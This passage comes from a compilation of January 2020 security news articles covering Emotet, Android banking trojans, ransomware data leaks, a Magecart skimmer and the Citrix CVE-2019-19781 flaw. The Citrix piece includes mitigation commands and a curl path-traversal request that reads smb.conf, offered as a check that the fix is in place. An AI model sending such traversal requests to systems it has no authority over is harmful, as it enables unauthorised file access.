When a user opens the document, malicious macros will be executed that download the Emotet trojan from a remote server and executes it.

Emotet will now quietly run in the background while using the infected device to send out further malicious spam. Eventually, Emotet will also install other payloads such as Trickbot, which will then be used to compromise the entire network and the devices on it.

As always, never open attachments from anyone without confirming over the phone that they did indeed send you the file. You should also always be cautious of enabling content or macros on any attachment you receive.

To be safe, it is advised that you also upload suspicious attachments to VirusTotal to check for malicious macros before opening it.


Android Trojan Steals Your Money to Fund International SMS Attacks
20.1.2020 
Bleepingcomputer  Android

An Android banking Trojan dubbed Faketoken has recently been observed by security researchers while draining its victims' accounts to fuel offensive mass text campaigns targeting mobile devices from all over the world.

Faketoken is an Android malware strain first introduced in an F-Secure report from 2012 as a Mobile Transaction Authentication Number (mTAN) interceptor camouflaged as a mobile token generator, a Trojan that later added ransomware capabilities in December 2016.

Besides using fake logins and phishing overlay screens to steal credentials and exfiltrating mTAN numbers used by banks to validate online transactions, the malware can also generate customized phishing pages targeting over 2,200 financial apps, and can steal device information such as the IMEI and IMSI numbers, the phone number, and more.

This Trojan is also capable of mimicking apps used for taxi service ride-hailing and for paying traffic tickers with the end goal of collecting payment card data as Kaspersky Lab discovered in August 2017.

Faketoken phishing screens (Kaspersky)
Faketoken phishing screens (Kaspersky)
Banking malware turned offensive mass texting tool
"Not long ago, our botnet activity monitoring system — Botnet Attack Tracking — detected that some 5,000 smartphones infected by Faketoken had started sending offensive text messages," says Alexander Eremin, malware analyst at Kaspersky Lab. "That seemed weird."

While the vast majority of mobile malware comes with SMS capability out of the box and it uses it for various purposes including intercepting text messages and spreading to other devices, banking malware using it to send mass texts is quite unusual.

Once it manages to infect a target's device, Faketoken will check if their bank accounts have enough money and it will use the stolen payment cards to add credit to the victim's mobile account.

After making sure that the funds are ready to be exhausted, Faketoken will proceed to send offensive text messages to local and international phone numbers to infect devices from all over the world on your dime.

"Faketoken’s messaging activities are charged to the infected device owners," Eremin adds. "Before sending anything out, it confirms that the victim's bank account has sufficient funds.

If the account has the cash, then the malware uses the card to top up the mobile account before proceeding with messaging."

This tactic allows it to siphon the victims' bank accounts and, given that Kaspersky Lab's researchers were able to detect roughly 5,000 smartphones infected with this Faketoken variant, the attackers can quickly add to their cash pile if others will also get infected.

Besides draining your bank account to fund its mass attacks against mobile devices from all over the world, Faketoken can also perform a wide array of other actions as instructed by the attackers:

• Change masks to intercept incoming text messages;
• Send text messages to a specified number with a specified text;
• Send text messages with a specified text to a specified list of recipients;
• Send a specified text message to all contacts;
• Upload all text messages from the device to the malicious server;
• Upload all the contacts from the device to the malicious server;
• Upload the list of installed applications to the malicious server;
• Reset the device to factory settings;
• Make a call to a specified number;
• Download a file to the device following a specified link;
• Remove specified applications;
• Create a notification on the phone to open a specified page or run a specified application;
• Start overlaying specified applications with a specified phishing window;
• Open a specified link in its own window;
• Run an application;
• Block the device in order to extort money for unblocking it. This command may include an option indicating the need to encrypt files.
Faketoken defense measures
To defend against Faketoken's recent attacks, Kaspersky Lab recommends only installing apps distributed through Google's official Play Store block installs from unknown sources by going into Settings -> Security and unchecking 'Unknown sources'.

Android users are also advised to always pay attention to the access permissions requested by apps during their installation seeing that even apps downloaded from the Google Play Store can come with malware.

And, more importantly in the case of this particular Faketoken variant, according to Kaspersky Lab you should "not follow links from messages unless you are sure they are safe — even messages from people you know.

For example, if someone who normally posts photos on social media or sends them through instant messaging apps instead sends you a text message with a link, that’s a red flag."


Windows 7 Reminder: Get a Free Windows 10 Upgrade While You Can
20.1.2020 
Bleepingcomputer  OS

With the Windows 7 end of life fast approaching, users need to decide whether they want to upgrade them to Windows 10 or just get a new PC.

Starting next Tuesday, January 14th, 2020, Windows 7 will reach its end of life, which means Microsoft will release the last cumulative update for all editions of the operating system.

This means no more security updates going forward. unless you purchase Extended Security Updates. and your computer will become vulnerable to any security vulnerabilities that are discovered in the future.

To remind people of the end of support, on January 15th, Microsoft will start displaying alerts in Windows 7 reminding them that the operating system is no longer supported and that they should upgrade to Windows 10.

Windows 7 End of Support Ad
Windows 7 End of Support Ad
The good news is that if you wish to upgrade to Windows 10, you can still do so for free using the steps in the following section.

Microsoft was supposed to remove this offer a long time ago, but it is still live.

There is, though, no idea how long this method will work, so if you wish to upgrade a device from Windows 7 to Windows 10 for free, you should do so as soon as possible.

How to upgrade to Windows 10 for free
You can grab a free copy of Windows 10 by running the Media Creation Tool on your Windows 7/8.1 PC. After performing the upgrade, you have to connect to the internet and your Windows 7 license will be converted to a digital entitlement of Windows 10.

Go to Microsoft's Windows 10 download page from here.
Click the 'Download Tool now' button and Media Creation Tool will download
Media Creation

Open the Media Creation Tool and agree to the license.
Select the 'Upgrade this PC now' option and click Next.
Upgrade

Select 'Keep all apps and files' and continue. Click on the Install button to begin the installation process of Windows.
Keep everything

During the installation, the computer will restart numerous times. This process can take a while, so please be patient.
Installing Windows 10

After Windows 10 is finished installing and you're connected, you can verify your Windows 10 activation from Settings > Windows Update > Activation.
We don't know when Microsoft will close this free upgrade method, but you should hurry up if you don't want to lose your free copy of Windows 10.


Sodinokibi Ransomware Publishes Stolen Data for the First Time
12.1.2020 
Bleepingcomputer  Ransomware

For the first time, the operators behind the Sodinokibi Ransomware have released files stolen from one of their victims because a ransom was not paid in time.

Since last month, the representatives of the Sodinokibi, otherwise known as REvil, have publicly stated that they would begin to follow Maze's example and publish data stolen from victims if they do not pay a ransom.

REvil post

While there have been threats made against Travelex and CDH Investments, they have not carried through with them.

This all changed today when the public representative of Sodinokibi stated they beginning to "keep promises" as they posted links to approximately 337MB of allegedly stolen victim files on a Russian hacker and malware forum.

Sodinokibi publishing victim's data
Sodinokibi publishing victim's data
Source: Damien
They claim this data belongs to Artech Information Systems, who describe themselves as a "minority- and women-owned diversity supplier and one of the largest IT staffing companies in the U.S", and that they will release more if a ransom is not paid.

"This is a small part of what we have. If there are no movements, we will sell the remaining, more important and interesting commercial and personal data to third parties, including financial details."

At this time, Artech's site is down and it is not known if it is due to this attack. BleepingComputer has reached out to Artech with questions related to the ransomware attack, but have not heard back.

As we have been saying over and over, ransomware attacks need to be treated with transparency and as a data breach.

By trying to hide these attacks, and the theft of employee, company, and customer data, companies are not only risking fines and lawsuits but are also putting personal data at risk.

This practice of using stolen data as leverage is not going to go away and is only going to get worse.

Expect to see more ransomware operators began to utilize this practice as it becomes the norm in attacks.


Android Trojan Kills Google Play Protect, Spews Fake App Reviews
12.1.2020 
Bleepingcomputer  Android
Android Trojan Kills Google Play Protect, Spews Fake App Reviews

An Android malware strain camouflaged as a system app is used by threat actors to disable the Google Play Protect service, generate fake reviews, install malicious apps, show ads, and more.

The heavily obfuscated malware dubbed Trojan-Dropper.AndroidOS.Shopper.a uses a system icon and the ConfigAPKs name which closely resembles the name of a legitimate Android service responsible for app configuration the first time a device is booted.

"Trojan-Dropper.AndroidOS.Shopper.a was most widespread in Russia, where the largest share of infected users (28.46%) was recorded in October – November 2019," Kaspersky Lab researcher Igor Golovin said. "Second place went to Brazil (18.70%) and third to India (14.23%)."

Shopper.a spread
Image: Kaspersky Lab
Malicious Play Store promotion services
Once it infects a victim's Android device, the malware downloads and decrypts the payload, then goes straight to information harvesting, collecting device info such as country, network type, vendor, smartphone model, email address, IMEI, and IMSI.

All this data is then exfiltrated to the operators' servers which will send back a series of commands to be run on the infected smartphone or tablet.

The attackers will utilize the Shopper.a Trojan to boost other malicious apps' ratings on the Play Store, post fake reviews on any apps' entries, install other apps from the Play Store or third-party app stores under the cover of an "invisible" window.

All this is done by abusing the Accessibility Service, a known tactic used by Android malware to perform a wide range of malicious activities without needing user interaction [1, 2, 3, 4]. If it has no permissions to access the service, the Trojan will use phishing to get them from the compromised device's owner.

The malware also disables the Google Play Protect mobile threat protection service, Google's built-in Android malware protection, so that it can go about its business undisturbed.

"Google Play Protect scans over 50 billion apps every day across more than two billion devices," according to the Android Security & Privacy 2018 Year In Review report published in March 2019.

Shopper.a receiving commands
Shopper.a receiving commands (Kaspersky Lab)
"The lack of installation rights from third-party sources is no obstacle to the Trojan — it gives itself the requisite permissions through Accessibility Service," Kaspersky Lab researcher Igor Golovin explained.

"With permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps. For instance, it can intercept data displayed on the screen, click buttons, and emulate user gestures."

Depending on what commands it receives from its masters, Shopper.a can perform one or more of the following tasks:

• Open links received from the remote server in an invisible window (whereby the malware verifies that the user is connected to a mobile network).
• After a certain number of screen unlocks, hide itself from the apps menu.
• Check the availability of Accessibility Service rights and, if not granted, periodically issue a phishing request to the user to provide them.
• Disable Google Play Protect.
• Create shortcuts to advertised sites in the apps menu.
• Download apps from the third-party “market” Apkpure[.]com and install them.
• Open advertised apps on Google Play and “click” to install them.
• Replace shortcuts to installed apps with shortcuts to advertised sites.
• Post fake reviews supposedly from the Google Play user.
• Show ads when the screen is unlocked.
• Register users through their Google or Facebook accounts in several apps.
"Cybercriminals use Trojan-Dropper.AndroidOS.Shopper.a to boost certain app’s rating and increase the number of installations and registrations," Golovin added.

"All this can be used, among other things, to dupe advertisers. What’s more, the Trojan can display advertising messages on the infected device, create shortcuts to ad sites, and perform other actions."

In related news, Google disclosed that Play Protect detected and removed around 1,700 applications infected with the Joker Android malware (also known as Bread) from the Play Store since the company started tracking this strain in early 2017.

To put things into perspective, while the Android Security & Privacy 2018 yearly review did not provide the exact number of removed malicious apps, the 2017 one states that the company "took down more than 700,000 apps that violated the Google Play policies, 70% more than the apps taken down in 2016."


Citrix ADC CVE-2019-19781 Exploits Released, Fix Now!
12.1.2020 
Bleepingcomputer  Exploit

Numerous working exploits for the Citrix ADC (NetScaler) CVE-2019-19781 vulnerability are finally here and have been publicly posted in numerous locations. There is no patch available for this vulnerability, but Citrix has provided mitigations, which should be applied now!

If successfully exploited, this vulnerability allows unauthenticated users to utilize directory traversal to perform arbitrary code execution.

Since late December, we have been reporting and security professionals have been warning that an exploit for this vulnerability is imminent and that administrators must apply mitigations to their devices as soon as possible.

Two days after reporting that attackers were attempting to exploit, or at least scan, for vulnerable devices, numerous exploits have been made public that allow attackers to take control of vulnerable Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) devices.

The public proof-of-concept (PoC) exploits that have been released allow attackers to easily create reverse shells back to their machines and execute commands on the vulnerable devices. This essentially allows an attacker to gain full control over these devices.

Security company MDSec published a technical nose dive for this vulnerability and provided a demonstration of how a working PoC can be used to create a reverse shell back to an attacker.

BleepingComputer will not be providing links to any of these exploits as we have too many readers who may use it for malicious reasons.

Mitigate your Citrix ADC devices now!
Even though Citrix disclosed this vulnerability almost a month ago, there is still no patch available for the Citrix ADC CVE-2019-19781 vulnerability.

Instead, Citrix has released a series of steps administrators can use to mitigate the problem.

These steps are different depending on how the system was installed, but you can use the following steps for a standalone system:

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config
Users are also advised to sign up for security alerts from Citrix to be notified when patches become available.

In the meantime, all administrators should apply the mitigation steps and also configure IDS systems to monitor for this threat.

According to TrustedSec, you can test if the mitigations have been applied properly, you can use the following command (replace host with the IP/hostname of your server):

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
If you receive a 403 response, it means you properly applied the mitigations. If you can see the smb.conf, the the mitigations were not done correctly and the device is still vulnerable.

TrustedSec has also provided a guide that can be used to check your devices for evidence of a compromise.

"With the recent Citrix ADC (NetScaler) CVE-2019-19781 Remote Code Execution vulnerability, the TrustedSec Incident Response team has been working closely with our offensive and research teams as they created a working exploit. This has allowed us to create a list of locations and indicators to search for on potentially compromised Citrix ADC hosts."

It is recommended that all Citrix ADC administrators become familiar with TrustedSec's forensics guide and monitor their devices for attacks.

Finally, Nextron Systems's Florian Roth has provided Sigma detection rules for SIEM systems that can be used to detect attempts to exploit the CVE-2019-19781 vulnerability against Citrix ADC (NetScaler) and Citrix Gateway devices.

Expected patch release dates
Citrix has contacted BleepingComputer to share a blog post containing the estimated dates that patches for the Citrix Application Delivery Controller (ADC) and Citrix Gateway CVE-2019-19781 vulnerability will become available.

The current schedule for these patches and their corresponding versions are below.

Version Refresh Build Expected Release Date
10.5 10.5.70.x 31st January 2020
11.1 11.1.63.x 20th January 2020
12.0 12.0.63.x 20th January 2020
12.1 12.1.55.x 27th January 2020
13.0 13.0.47.x 27th January 2020
Updated 1/11/20 11:05 PM EST: Updated article to include estimated patch dates for various versions of the affected Citrix software.


Australia Bushfire Donors Affected by Credit Card Skimming Attack
12.1.2020 
Bleepingcomputer  CyberCrime

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals the payment information of the donors.

This type of attack is called Magecart and involves hackers compromising a web site and injecting malicious JavaScript into eCommerce or checkout pages. These scripts will then steal any credit cards or payment information that is submitted and send it off to a remote site under the attacker's control.

The Malwarebytes Threat Intelligence Team has discovered a legitimate web site collecting donations for the tragic bushfires in Australia that has been compromised by a Magecart script.

While the donors were probably not targeted by this attack, they are unfortunately caught in the cross fire.

When a visitor of the site adds an item to their cart, such as a donation, a malicious credit-card skimmer script named ATMZOW will be loaded into the checkout pages.

Donation page with the ATMZOW skimmer
Donation page with the ATMZOW skimmer
When a user submits their payment information as part of the checkout process, the malicious script will steal the submitted information and send it to the vamberlo[.]com domain. This domain is obfuscated in the script as shown below.

Obfuscated domain that payment information is sent to
The obfuscated domain that payment information is sent to
Malwarebytes' Jérôme Segura has told BleepingComputer that once they became aware of the compromised site they were able to get the vamberlo[.]com shut down.

For now, this means that any visitors to the site will no longer have their payment information stolen.

As the code is still active on the site, though, it could be modified by the hackers to utilize a new domain that will enable the skimming script again.

Malwarebytes has contacted the site about the malicious script injected into their eCommerce store but has not heard back at this time.

Skimmer active on other sites
Using the PublicWWW tool, Troy Mursch of Bad Packets Report has also discovered that this same script is currently active on 39 other web sites

Skimmer active on other sites
Skimmer active on other sites
It is not known if those sites are utilizing the same domain to send payment information.

If they are, then with the shutdown of the vamberlo[.]com domain, they will no longer be active as well.


Maze Ransomware Publishes 14GB of Stolen Southwire Files
12.1.2020 
Bleepingcomputer  Ransomware

The Maze Ransomware operators have released an additional 14GB of files that they claim were stolen from one of their victims for not paying a ransomware demand.

In December the Maze Ransomware operators attacked Southwire, a wire and cable manufacturer out of Georgia, and allegedly stole 120GB worth of files before encrypting 878 devices on the network.

Maze then demanded $6 million in bitcoins or they would publicly release Southwire's stolen files.

When Southwire did not make a payment, the Maze operators uploaded some of the company's files to a "News" site that they had created to shame non-paying victims.

This led to Southwire filing a lawsuit against Maze in Georgia courts and asking for an injunction in the courts of Ireland against a web hosting provider who was hosting the Maze news site. This injunction led to the site being taken down and Southwire's stolen data being accessible.

"Not in retaliation"
Yesterday, the Maze operators released an additional 14.1GB of stolen files that they claim belong to Southwire on a Russian hacking forum. They further state that they will continue to release 10% of the data every week unless the ransom is paid.

"But now our website is back but not only that. Because of southwire actions, we will now start sharing their private information with you, this only 10% of their information and we will publish the next 10% of the information each week until they agree to negotiate. Use this information in any nefarious ways that you want", the Maze operators stated in their post.

When we asked the Maze operators if they released this additional data out of retaliation for the lawsuit, BleepingComputer was told:

" Before lawsuit it was just few files as a proof. Now it is 10% of 120GB, but not in retaliation. It was planned if they don't negotiate. We will post new parts every week if they don't change their mind.
So the next week another 10%, after 2 weeks another 10% and so on while 100% (120GB) is not published. They can stop this process by negotiating with us and revert it to full data destruction after payment.
In retaliation we have something more interesting ;)
But retaliation doesn't come if they begin negotiate with us."

When we asked what they meant by "something more interesting", they would not elaborate any further.

Ultimately, all companies should never pay a ransom as it only encourages this type of criminal behavior to continue. It is also easy to say that when you are not in Southwire's predicament.

Southwire now needs to weigh the cost of their data being exposed versus the cost of paying the ransom.

If their data contains third-party information, including personal information about employees or customers, then this attack would need to be classified also as a data breach.

This would then require additional costs for government notifications, customer and employee notifications, and potentially fines depending on any privacy laws that may have been violated.

As the data is being released in small batches, each one would constitute a separate data breach but could also potentially be reported under one breach notification.

BleepingComputer has contacted Southwire regarding the release of additional files, but have not heard back at this time.


Sodinikibi Ransomware Hits New York Airport Systems
12.1.2020 
Bleepingcomputer  Ransomware

Albany International Airport's staff announced that the New York airport's administrative servers were hit by Sodinokibi Ransomware following a cyberattack that took place over Christmas.

Airport operations were not impacted by the ransomware attack and customers' financial or personal information was not accessed by the attackers according to a statement from airport officials per WNYT-TV.

No airline or TSA servers were affected in the incident, with airport officials saying that the vast majority of encrypted files being administrative documents and archived data.

The Albany County Airport Authority alerted the FBI and the New York State Cyber Command as soon as the attack was discovered, and also hired the services of ABS Solutions to help with the investigation.

MSP's breached systems used as a stepping stone
The attackers were able to infiltrate the New York airport's systems through the maintenance server of its managed service provider (MSP) Logical Net, a Schenectady, NY-based data center services and hosted cloud solutions provider.

The Sodinokibi Ransomware malware spread through the Albany County Airport Authority's network and also reached the backup servers.

Following the attack, airport CEO Philip Calderone told Times Union that "We have severed our relationship with LogicalNet."

Left without backups, the airport paid the "under six figures" ransom the attackers demanded. Albany International Airport's insurer reimbursed part of the ransom payment, with a $25,000 deductible to be recovered from Logical Net.

"Thanks to the fast action by our IT department, airport operations during one of the busiest travel periods of the year were not impacted and no passenger or airline data was acquired or accessed," Calderone added.

"Within hours the authority was able to resume all administrative functions with systems functioning as normal. We are grateful for the assistance provided by the New York State Cyber Command, the FBI and our consultant ABS."

BleepingComputer has contacted the Albany International Airport, Logical Net, and the Sodinokibi actors asking for more details but has not yet heard back.

High-profile Sodinokibi victims
International foreign currency exchange Travelex is another company hit by Sodinokibi on New Year's Eve, with the company being forced to shut down all its systems "to protect data and prevent the spread of the virus."

Following the complete systems shut down, customers were unable to use the site or the app for transactions at around 1,500 Travelex locations across the world.

While Travelex said in a statement that there is no evidence that any of its data was stolen in the attack, the Sodinokibi crew later told BleepingComputer that they copied over 5GB of personal and financial data, including but not limited to names, dates of birth, social security numbers, payment card info.

They also said that Travelex's backup files were also deleted and they will start publishing the stolen data if the company doesn't pay the $3 million ransom in seven days.

U.S. data center provider CyrusOne also had some of its systems encrypted by Sodinokibi Ransomware in early December 2019, while hundreds of dental practices using the online backup product DDS Safe had their files locked in August after the software's developer got infected through its cloud management provider, PercSoft.


Beware of Amazon Prime Support Scams in Google Search Ads
12.1.2020 
Bleepingcomputer  Spam

A malicious ad campaign is underway in Google Search results that lead users to fake Amazon support sites and tech support scams.

A security researcher reached out to BleepingComputer today about search keywords such as "amazon prime" and "amazon prime customer support" that leads to ads pretending to be Amazon Prime support.

For example, in the image below simply searching for "amazon prime" resulted in a fake and shady-looking support ad hosted on sites.google.com.

Scam ads in Google Search results
Scam ads in Google Search results
BleepingComputer performed these searches and was able to verify that these malicious ads were being displayed.

When a user clicks on the ad they will be brought to a page that attempts to impersonate Amazon and includes a phone number to call to receive help. This number is 1-844-325-7794, which is different from the legitimate Amazon support number of 1 (888) 280-4331.

Fake Amazon Support Site
Fake Amazon Support Site
When BleepingComputer attempted to call the number, we received a busy signal each time we called.

In addition to Amazon support scams, other ads discovered by the researcher were for the search keywords "my account" and "login" that lead to a variety of different tech support scams like the one below.

Tech Support Scam ads in Google Search
Tech Support Scam ads in Google Search
Clicking on these ads lead to tech support scams located on sites such as sites.google.com, Azure, and other providers.

Tech Support Scam via Google Ads
Tech Support Scam via Google Ads
Now many of you may look at these ads and wonder how anyone could fall for them.

The reality is that there are many people, especially older people, who are not comfortable with computers, the Internet, and receiving support via online chat and email.

These types of people are more apt to search for a support phone number and then click on a link without properly analyzing the ad for suspicious characteristics.

Users need to be very careful of the sites that they click on in search results because in many cases they are not vetted properly and can lead to malicious sites.

This is especially true during the holiday or right after as users are commonly looking for support numbers for presents that they have received.


US Govt Warns of Attacks on Unpatched Pulse VPN Servers
12.1.2020 
Bleepingcomputer  BigBrothers

The US Cybersecurity and Infrastructure Security Agency (CISA) today alerted organizations to patch their Pulse Secure VPN servers as a defense against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability.

This warning follows another alert issued by CISA in October 2019, and others coming from the National Security Agency (NSA), the Canadian Centre for Cyber Security, and UK's National Cyber Security Center (NCSC).

Pulse Secure reported the vulnerability tracked as CVE-2019-11510 and disclosed by Orange Tsai and Meh Chang from the DEVCORE research team, and by Jake Valletta from FireEye in an April 2019 out-of-cycle advisory.

The company also issued software updates to patch all affected Pulse Connect Secure and Pulse Policy Secure versions.

"CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes," today's DHS alert warns.

Unpatched Pulse Secure VPN servers remain an attractive target for malicious actors. @CISAgov released an Alert on continued exploitation of CVE-2019-11510 in Pulse Secure. Update ASAP! https://t.co/n7mx9juifv #Cyber #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) January 10, 2020
If left unpatched, CVE-2019-11510 could allow remote unauthenticated attackers to compromise vulnerable VPN servers and "gain access to all active users and their plain-text credentials" and execute arbitrary commands.

On unpatched systems, the flaw "allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords)," security researcher Kevin Beaumont explains.

According to an NSA advisory from October 2019, "Exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code."

"Actors will take advantage of the vulnerability that was reported on Pulse Secure, Fortinet and Palo Alto VPN products – and in this case, exploit unpatched VPN servers to propagate malware, REvil (Sodinokibi), by distributing and activating the Ransomware through interactive prompts of the VPN interface to the users attempting to access resources through unpatched, vulnerable Pulse VPN servers," Pulse Secure Chief Marketing Officer Scott Gordon told Bleeping Computer.

Week 19 CVE-2019-11510 Scan Results
• Vulnerable Pulse Secure VPN servers detected: 3,825

Our latest vulnerability scan results are freely available for authorized CERT, CSIRT, and ISAC teams.

Submit request here: https://t.co/vlS08kyQo2#cybersecurity #infosec #threatintel

— Bad Packets Report (@bad_packets) January 4, 2020
While on August 25, 2019, cyber threat intelligence outfit Bad Packets was able to discover 14,528 unpatched Pulse Secure servers, this month a subsequent scan yielded 3,825 results showing that a vast majority of orgs patched their VPN gateways.

Since August 2019, Bad Packets Chief Research Officer Troy Mursch reached out to organizations that haven't yet patched their assets, alerting them of the serious damage attackers could inflict on their systems if they leave their servers unpatched.

While not yet confirmed, a high-profile case of an organization directly affected by not patching their Pulse Secure servers could be the international foreign currency exchange Travelex which had its systems infected with Sodinokibi ransomware after an attack that took place on December 31.

Travelex Pulse Secure warning
Image: Bad Packets
As it happens, Travelex was one of the organizations that Mursch warned of the issue in September 2019. Unfortunately, Travelex did reply to his email.

Beaumont also found several Internet-exposed Windows servers with RDP enabled and the Network Level Authentication feature toggled off on Travelex's AWS platform. This could allow potential attackers to connect before authenticating.


VVVVVV Source Code Released to Mark 10th Anniversary
12.1.2020 
Bleepingcomputer  IT

Distractionware has released the source code for their VVVVVV platform game to mark its 10th anniversary. You can now download the game engine to make your own modifications or get a better understanding of how the game works.

Released in 2010, VVVVVV is a 2D puzzle platform game created by Terry Cavanagh of Distractionware that has an "Overwhelmingly Positive" rating on Steam based on 4,000+ reviews.

While most platform games allow you to jump to get around obstacles and complete puzzles, VVVVVV does not include this feature. Instead users must reverse gravity as a means of solving puzzles as shown in the video below from the developer.

To mark the game's 10th anniversary, Cavanagh has released the source code for the game engine, including all the levels and text used in the game.

"VVVVVV is such an important game to me, I barely even know where to start. I wanted to do something special to mark the occasion: so, as of today, I’m releasing the game’s source code!"

The source code for both the mobile and desktop versions are available on Github, but they do not include any of the images or music for the game as it is under a proprietary license. Users who wish to use these assets can download the Make and Play Edition, which includes a level editor and the player levels.

To compile the Desktop version, the following environment is required with the engine requiring the SDL2 and SDL2_mixer libraries.

Windows: Visual Studio 2010
macOS: Xcode CLT, currently targeting 10.9 SDK
GNU/Linux: CentOS 7
For the Mobile version, users require Adobe AIR, targeting SWF version 36.

For those who wish to see how the engine behind a successful games works, this source code is a valuable learning opportunity.


Microsoft Enables Security Defaults in Azure Active Directory
12.1.2020 
Bleepingcomputer  Security

Microsoft introduced new secure default settings dubbed 'Security Defaults' to Azure Active Directory (Azure AD), now available for all license levels, including trial tenants.

Since introducing the Security Defaults feature that replaces baseline protection policies, Microsoft says that it has already been enabled for over 60k newly created tenants, with another roughly 5k also having opted in.

This move's end goal is to make sure that all organizations using Azure AD have a basic level of security-enabled at no extra cost according to Microsoft.

Preconfigured defense against identity-related attacks
Security Defaults in Azure AD is a set of basic Microsoft-recommended identity security mechanisms containing preconfigured security settings for common attacks such as password spray, replay, and phishing.

The new Azure AD security feature is automatically enforced across the entire organization when toggled on, and they help protect both admins and users from common identity-related attacks.

"Security defaults provide secure default settings that we manage on behalf of organizations to keep customers safe until they are ready to manage their own identity security story," Director of Identity Security at Microsoft Alex Weinert said.

"For customers like this, we’ll manage their security settings like we do for our Xbox, OneDrive, Skype and Outlook users."

Currently, enabling Security Defaults will require all users and admins to register for multi-factor authentication (MFA), will challenge users with MFA for critical roles and tasks and when they're connecting from a new device or app, and will also disable authentication from legacy auth clients with no MFA support.

Enabling Security Defaults in Azure Active Directory

Enabling Security Defaults in Azure Active Directory
Source: Microsoft
The MFA focus is explained by the fact that MFA prevents over 99.9% of account compromise attacks when enabled according to Microsoft's telemetry data.

To put things into perspective when talking about MFA, Weinert said in July 2019 that "your password doesn’t matter, but MFA does! Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA."

In October, he also added that "use of anything beyond the password significantly increases the costs for attackers, which is why the rate of compromise of accounts using any type of MFA is less than 0.1% of the general population."

Enable from the Azure portal
Security Defaults can be enabled from the Azure portal in your directory following this procedure:

Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator.
Browse to Azure Active Directory > Properties.
Select Manage security defaults.
Set the Enable security defaults toggle to Yes.
Select Save.
Azure AD admins who already use Conditional Access to manage their organization's directory settings and who look for flexibility are not the target of Security Defaults and should continue to use Conditional Access policies.

While using Conditional Access will prevent them from enabling Security Defaults, they can still "use CA to configure custom policies that enable the same behavior provided by Security Defaults."

Conditional Access prevents enabling Security defaults

Conditional Access prevents enabling Security defaults
Source: Microsoft
"With millions of organizational accounts vulnerable to preventable compromise each year, we felt we needed to take a different tack – to protect organizational accounts just like we do the consumer accounts," Weinert added.

"We will expand first to apply security defaults to all new tenants as well as applying it retroactively to existing tenants who have not taken any security measures for themselves."

In October, Microsoft announced the addition of an Azure Active Directory (AD) sign-in history feature to detect any unusual login activity, as well as 16 new lower-privileged roles to help admins boost security and further enhance Azure and Microsoft 365 granular delegation capabilities.

Azure AD Identity Protection detection algorithms' accuracy was also increased by 100% in August to boost compromised account detection capabilities, while the false-positive rate was reduced by around 30%.

The Azure AD Password Protection feature was also made generally available in April making it possible to block commonly used and compromised passwords to drastically reduce password spray attack risks.


Google Chrome Will Support Windows 7 After End of Life
12.1.2020 
Bleepingcomputer  OS

Google has officially stated that they will continue to support the Chrome browser in Windows 7 to give businesses more time to migrate to Windows 10.

On January 14th, 2020, Windows 7 will reach End of Life, which means that unless you purchased Extended Security Updates licenses, Microsoft will no longer provide vulnerability or bug fixes for the operating system.

For businesses, migrating to a new operating system can be a long and arduous task and while some may argue that organizations have had enough time to do so, many factors could come into play that delays this migration.

This means that many businesses will continue to utilize Windows 7 even after it has reached End of Life and no longer receives critical security updates.

For organizations that rely on Google Chrome for their web applications or SaaS apps, Google has stated that they will continue to fully support Chrome on Windows 7 through at least July 15th, 2021.

"We have enterprises covered, even if they haven’t yet made the full move to Windows 10. We will continue to fully support Chrome on Windows 7 for a minimum of 18 months from Microsoft’s End of Life date, until at least July 15, 2021. So if you haven’t started your move to Windows 10 yet, or even if your organization is mid-way through migration, you can still benefit from the enterprise capabilities of Chrome."

With Google supporting Chrome on Windows 7 after EoL, users will continue to receive security updates for the browser and enterprise policies and management tools will continue to work.

If users utilize a Google Account with Chrome, then all of their settings, bookmarks, and installed extensions will also be available on machines where they are also logged into Chrome.

This allows for a seamless migration when users ultimately upgrade their machines to a newer version of Windows.

While it is great that Google will continue to support Windows 7 for the foreseeable future, businesses should make it a priority to upgrade to a modern operating system.

Using Windows 7 after EoL is simply too much of a security risk that potentially leaves companies open to threats that could cost them far more than the migration to Windows 10.


Ako Ransomware: Another Day, Another Infection Attacking Businesses
12.1.2020 
Bleepingcomputer  Ransomware

Like moths to a flame, new ransomware targeting businesses keep appearing every day as they are enticed by the prospects of million-dollar ransom payments. An example of this is a new ransomware called Ako that is targeting the entire network rather than just individual workstations.

Ako was discovered yesterday when a victim posted in the BleepingComputer support forums about a new ransomware that had encrypted both their Windows 10 desktop and their Windows SBS 2011 server.

Forum Post about Ako
Forum Post about Ako
After looking at the ransom note and the Tor payment site, it quickly became apparent that this was not a ransomware infection we had seen before.

Looking on VirusTotal, I was able to find an older sample of the ransomware and shared it with SentinelLab's Vitali Kremez who offered to help analyze it. Soon after, newer samples [1, 2] were found that allowed us to see a broader picture of how this ransomware works.

According to Kremez, who performed the analysis of the ransomware, Ako shares some similarities to MedusaLocker that has led people to call it MedusaReborn.

"This is the new ransomware-as-a-service offering under development with the version 0.5 that seems to be inspired by the Medusa Locker behavior including its anti-Windows behavior and registry mapped drive disable targeting and isolating specific machines for encryption," Kremez told BleepingComputer.

The ransomware operators confirmed this by telling BleepingComputer via email that the Ako ransomware is their own program.

"We see news about us. But that is wrong. About MedusaReborn. We have nothing to do with Medusa or anything else. This is our own product - Ako Ransomware, well, this is if you are of course interested."

To make matters worse, when we asked the ransomware operators if they are stealing data before encrypting, they told us "Yes, it's our job."

